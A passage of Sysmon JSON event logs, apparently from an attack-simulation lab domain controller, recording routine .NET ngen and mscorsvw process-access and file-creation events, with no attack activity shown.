C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.793","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00102C170F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.793\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00102C170F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.793","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00102C170F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.793\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-00102C170F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.793","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-00102C170F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:45.840\r\nProcessGuid: {A837DB8D-0495-5F25-0000-00102C170F00}\r\nProcessId: 2436\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\984-0\\PresentationFramework-SystemDrawing.dll\r\nCreationUtcTime: 2020-08-01 05:58:45.840","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:45.840","ProcessGuid":"{A837DB8D-0495-5F25-0000-00102C170F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\984-0\\PresentationFramework-SystemDrawing.dll","CreationUtcTime":"2020-08-01 05:58:45.840","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.887\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.887","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.933\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.933","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.933\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.933","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:45.933\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 